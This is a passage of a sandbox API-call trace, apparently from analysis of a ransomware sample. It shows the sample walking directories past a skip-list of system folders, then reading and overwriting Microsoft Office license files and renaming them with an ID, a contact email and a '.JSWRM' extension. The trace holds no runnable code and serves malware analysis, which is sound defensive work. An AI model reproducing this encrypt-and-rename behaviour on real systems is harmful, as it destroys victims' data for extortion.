(lpString1="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0105.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0105.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0105.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0105.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0105.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0105.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.714] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11644) returned 1 [0105.715] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.715] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.718] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.718] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.718] CloseHandle (hObject=0x45c) returned 1 [0105.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0105.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0105.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0105.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0105.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0105.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0105.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0105.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0105.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0105.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.723] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6f3faed, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6f3faed, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6ffe67f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription1-pl.xrm-ms", cAlternateFileName="O3BD6B~1.XRM")) returned 1 [0105.723] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2=".") returned 1 [0105.723] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="..") returned 1 [0105.723] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="...") returned 1 [0105.723] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="windows") returned -1 [0105.724] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="recovery") returned -1 [0105.724] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.724] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.724] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.724] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.724] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpString2="msocache") returned 1 [0105.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0105.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0105.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0105.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0105.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0105.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.725] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11215) returned 1 [0105.725] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0105.725] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.728] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.728] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.728] CloseHandle (hObject=0x45c) returned 1 [0105.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0105.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0105.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0105.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0105.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0105.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.729] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0105.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.730] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6ef3604, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6ef3604, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6fb21bb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6c57, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription1-ppd.xrm-ms", cAlternateFileName="O3687D~1.XRM")) returned 1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2=".") returned 1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="..") returned 1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="...") returned 1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="windows") returned -1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.730] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0105.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22ce70, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0105.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0105.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0105.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0105.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0105.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0105.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.731] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=27735) returned 1 [0105.731] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6c50) returned 0x24c1d0 [0105.731] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6c50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6c50, lpOverlapped=0x0) returned 1 [0105.735] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.735] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6c50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6c50, lpOverlapped=0x0) returned 1 [0105.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.736] CloseHandle (hObject=0x45c) returned 1 [0105.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0105.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0105.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0105.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0105.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0105.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.736] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0105.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0105.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.737] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e34a2d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6e34a2d, 